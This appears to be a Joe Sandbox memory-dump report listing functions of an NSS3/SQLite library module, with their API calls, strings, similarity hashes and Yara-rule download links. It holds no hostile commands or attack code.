Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: e62ec4930a4ae7703b281af7647e568b8ba64fbbb7678a6ec12a2cfcfe6f5a2a
Instruction ID: 4c8cfc706fc83b03c7517f3490e5126ddc8325c9d06ed16d40a75c5444d990a3
Opcode Fuzzy Hash: e62ec4930a4ae7703b281af7647e568b8ba64fbbb7678a6ec12a2cfcfe6f5a2a
Instruction Fuzzy Hash: EA01FEB2B812105FEB0196ACAC817AF31784B8755DF284036E805CF701F615D9474AD3

Function 6CF9BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CF97AFE,?,?,?,?,?,?,?,?,6CF9798A), ref: 6CF9BDC3
free.MOZGLUE(?,?,6CF97AFE,?,?,?,?,?,?,?,?,6CF9798A), ref: 6CF9BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CF97AFE,?,?,?,?,?,?,?,?,6CF9798A), ref: 6CF9BDE9
free.MOZGLUE(?,00000000,00000000,?,6CF97AFE,?,?,?,?,?,?,?,?,6CF9798A), ref: 6CF9BE21
free.MOZGLUE(00000000,00000000,?,6CF97AFE,?,?,?,?,?,?,?,?,6CF9798A), ref: 6CF9BE32

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: a677b4722f65fcbb6425baa8adce7fc4ebdb4e188fa40bedda4a6ce9c424636e
Instruction ID: 268a4cc561f5180374ac398366f38f32cad4c2e9ad9264e49a26a4dc0b12a96f
Opcode Fuzzy Hash: a677b4722f65fcbb6425baa8adce7fc4ebdb4e188fa40bedda4a6ce9c424636e
Instruction Fuzzy Hash: 87110DB6F21216AFDFD0DF29C8097463BB5AB4E254B540465D60AC77A0F732A414CB91

Function 6CEE3E10 Relevance: 7.5, APIs: 5, Instructions: 45memoryfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,00000000,?,6CEE3975), ref: 6CEE3E29
PORT_Alloc_Util.NSS3(00000000,?,00000000,?,6CEE3975), ref: 6CEE3E38

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,6CEE3975), ref: 6CEE3E52
DeleteFileW.KERNEL32(00000000), ref: 6CEE3E5D
free.MOZGLUE(00000000), ref: 6CEE3E64

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_DeleteFileUtilValuefreemalloc
String ID:
API String ID: 3873820591-0
Opcode ID: 2bc2aa9c59d5769747403d178e2ca92c8e6611a32c9b1fe5893b5da8f91f689d
Instruction ID: 7ae310c03ca6a3b9003c126fba973013c82c6aa91fd10c853f749b3ebedb3b9c
Opcode Fuzzy Hash: 2bc2aa9c59d5769747403d178e2ca92c8e6611a32c9b1fe5893b5da8f91f689d
Instruction Fuzzy Hash: E1F054B57162123BFA1025796C49F3736ACDB469F9B340635BE29C56E1ED40DC114271

Function 6CF97C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6CF97C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF97C83
malloc.MOZGLUE(00000001), ref: 6CF97C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF97C9F
PR_GetCurrentThread.NSS3 ref: 6CF97CAD

Part of subcall function 6CF49BF0: TlsGetValue.KERNEL32(?,?,?,6CF90A75), ref: 6CF49C07

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 3c5bfdea1a7f2495faa7623b539cd09cb6ddb2f52d7ac1cf7a24b2be6252164a
Instruction ID: 8a56bf6397befb5c99feb483c957addc53edd8ce31a8e6cab721d4446f059c6d
Opcode Fuzzy Hash: 3c5bfdea1a7f2495faa7623b539cd09cb6ddb2f52d7ac1cf7a24b2be6252164a
Instruction Fuzzy Hash: 29F0C2B1A102066BEF049F3AAC099477B5CEF00265B018436E819C3B01EB30E114CAE6

Function 6CF9ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CF9A6D8), ref: 6CF9AE0D
free.MOZGLUE(?), ref: 6CF9AE14
DeleteCriticalSection.KERNEL32(6CF9A6D8), ref: 6CF9AE36
free.MOZGLUE(?), ref: 6CF9AE3D
free.MOZGLUE(00000000,00000000,?,?,6CF9A6D8), ref: 6CF9AE47

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 7dc403061e977cee45b493d7144a178ee4cf8520a255e1745c445b7101a52a11
Instruction ID: 406edef89dc185b5e84f266cf069f10071bf064358190c6f0c88040ee5117d81
Opcode Fuzzy Hash: 7dc403061e977cee45b493d7144a178ee4cf8520a255e1745c445b7101a52a11
Instruction Fuzzy Hash: 75F09675A01A01A7DE11AF79D808A5777B8BF867757140328E52A83940D731F115C7D5

Function 6CE27C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE27D35

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE27D13, 6CE27D1F, 6CE27D47, 6CE27D53, 6CE27D5F
database corruption, xrefs: 6CE27D29
%s at line %d of [%.10s], xrefs: 6CE27D2E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: d59447016b0f163ae518bc582c3d5749df7579db3fa55682194e3b90c9546595
Instruction ID: 47ac708f25d106685b2cec7be9a7c2425f87c29647b3bdca530757085fcc8ac0
Opcode Fuzzy Hash: d59447016b0f163ae518bc582c3d5749df7579db3fa55682194e3b90c9546595
Instruction Fuzzy Hash: B7310971E0422697C710CF9EC880ABEB7F1EF4A309B690196E444B7782D775DC41C7A5

Function 6CE16C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CE16D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE16D20
database corruption, xrefs: 6CE16D2A
%s at line %d of [%.10s], xrefs: 6CE16D2F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: cadb321bceac6744af19fdbb819278c3f0f3e7b8b76a83b265e2f3c852aafb92
Instruction ID: 492a79040ac9a2da068ba694941ff03b1ac6b16ff32f800e1a296c6ce353a96b
Opcode Fuzzy Hash: cadb321bceac6744af19fdbb819278c3f0f3e7b8b76a83b265e2f3c852aafb92
Instruction Fuzzy Hash: EA2100717183059BC7109E1AC841B9AB7FAEF81308F34892CD8499BF50E371F969CB92

Function 6CEF2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+l,6CEF32C2,<+l,00000000,00000000,?), ref: 6CEF2FDA

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CEF300B

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CEF302A

Part of subcall function 6CEE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE08B4

Part of subcall function 6CECC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6CECC45D
Part of subcall function 6CECC3D0: TlsGetValue.KERNEL32 ref: 6CECC494
Part of subcall function 6CECC3D0: EnterCriticalSection.KERNEL32(?), ref: 6CECC4A9
Part of subcall function 6CECC3D0: PR_Unlock.NSS3(?), ref: 6CECC4F4

Strings

<+l, xrefs: 6CEF2FD0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+l
API String ID: 2538134263-555380133
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 35e48f3063789094f5a4df611ba39e49066095e1721ffd7dea65bb4d5daed2b7
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 4F11EBB6B001046BDB008E64EC00A9B77E99B842ACF384139EC2CD7781E772ED16C791

Function 6CF4CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CF4CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CF4CC7B), ref: 6CF4CD7A
Part of subcall function 6CF4CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CF4CD8E
Part of subcall function 6CF4CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CF4CDA5
Part of subcall function 6CF4CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CF4CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CF4CCB5
memcpy.VCRUNTIME140(6CFE14F4,6CFE02AC,00000090), ref: 6CF4CCD3
memcpy.VCRUNTIME140(6CFE1588,6CFE02AC,00000090), ref: 6CF4CD2B

Part of subcall function 6CE69AC0: socket.WSOCK32(?,00000017,6CE699BE), ref: 6CE69AE6
Part of subcall function 6CE69AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CE699BE), ref: 6CE69AFC

Part of subcall function 6CE70590: closesocket.WSOCK32(6CE69A8F,?,?,6CE69A8F,00000000), ref: 6CE70597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CF4CCB0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: d489f4be2971bb82b04e0f2a66395ed5fe443a5fd26f3521bb77c18c3945ac80
Instruction ID: f4e54b0560a41710ad105d9f48face06fd1577792687f00eca218fa70ab03048
Opcode Fuzzy Hash: d489f4be2971bb82b04e0f2a66395ed5fe443a5fd26f3521bb77c18c3945ac80
Instruction Fuzzy Hash: B21133B1F113407EEFD09B5B9C467563AB8934E218F14A039E5168BB53E772C448CBD2

Function 6CEB1CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6CEB1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CEB1CF1

Part of subcall function 6CF909D0: PR_Now.NSS3 ref: 6CF90A22
Part of subcall function 6CF909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CF90A35
Part of subcall function 6CF909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CF90A66
Part of subcall function 6CF909D0: PR_GetCurrentThread.NSS3 ref: 6CF90A70
Part of subcall function 6CF909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CF90A9D
Part of subcall function 6CF909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CF90AC8
Part of subcall function 6CF909D0: PR_vsmprintf.NSS3(?,?), ref: 6CF90AE8
Part of subcall function 6CF909D0: EnterCriticalSection.KERNEL32(?), ref: 6CF90B19
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CF90B48
Part of subcall function 6CF909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CF90C76
Part of subcall function 6CF909D0: PR_LogFlush.NSS3 ref: 6CF90C7E

Strings

pInitArgs = 0x%p, xrefs: 6CEB1CEC
C_Initialize, xrefs: 6CEB1CD3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: e6e3ff3e68bec83eff7474cf5f0f9b7e2465de4d4df17e7a31b66854504e5b70
Instruction ID: ead31d5a0e7eb439b053499e516d46e95fef34df116c4bc649fb1bb563a5afb6
Opcode Fuzzy Hash: e6e3ff3e68bec83eff7474cf5f0f9b7e2465de4d4df17e7a31b66854504e5b70
Instruction Fuzzy Hash: 4601D234A10081EFDFD49B94DA48B6533B5EBCA32AF144428E408E2711EF35D949CB92

Function 6CE17F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CE181DF
LeaveCriticalSection.KERNEL32(?), ref: 6CE18239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE18255
sqlite3_free.NSS3(00000000), ref: 6CE18260

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: 531aa67391635d9ae60940e2845b8cdda93b6ed027a9a54e221ecd2b53ea9c96
Instruction ID: be877f7b4ae58ae9b3b29dffa8f958f03def080d105c45eadcc240430238eb68
Opcode Fuzzy Hash: 531aa67391635d9ae60940e2845b8cdda93b6ed027a9a54e221ecd2b53ea9c96
Instruction Fuzzy Hash: E491AE31E152089FEB44DFE0D8487ADBBB2BF0A308F35412ED4169BA54DB396965CB81

Function 6CEF1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CEF1D8F

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEF1DA6

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CEF1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CEF1ED0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: b8ca846fcce3ad9e17ff1e2c2f104b42900a882743dc487c4cd1abbfb4969a3a
Instruction ID: d0c763e5dc14281bcf206430b1637f0fab52f7039cc98a343b5c006b633d3ece
Opcode Fuzzy Hash: b8ca846fcce3ad9e17ff1e2c2f104b42900a882743dc487c4cd1abbfb4969a3a
Instruction Fuzzy Hash: 89514AB5A0030DDFDB14CF98C884BAEBBB6BF49358F244129D8299B751D731E946CB90

Function 6CF44FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CE285D2,00000000,?,?), ref: 6CF44FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF4500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF450C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF450D6

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 897081f9ee58480959a8574b92de3037a01e77c728743b846db4821ad9404343
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 564182B6A402158FDB18CF18DCD179ABBE1BF4431871D866DD84ACBB02E775E891CB81

Function 6CE6FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6CE6FDFE), ref: 6CE6FFAD

Part of subcall function 6CE0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CE6F9C9,?,6CE6F4DA,6CE6F9C9,?,?,6CE3369A), ref: 6CE0CA7A
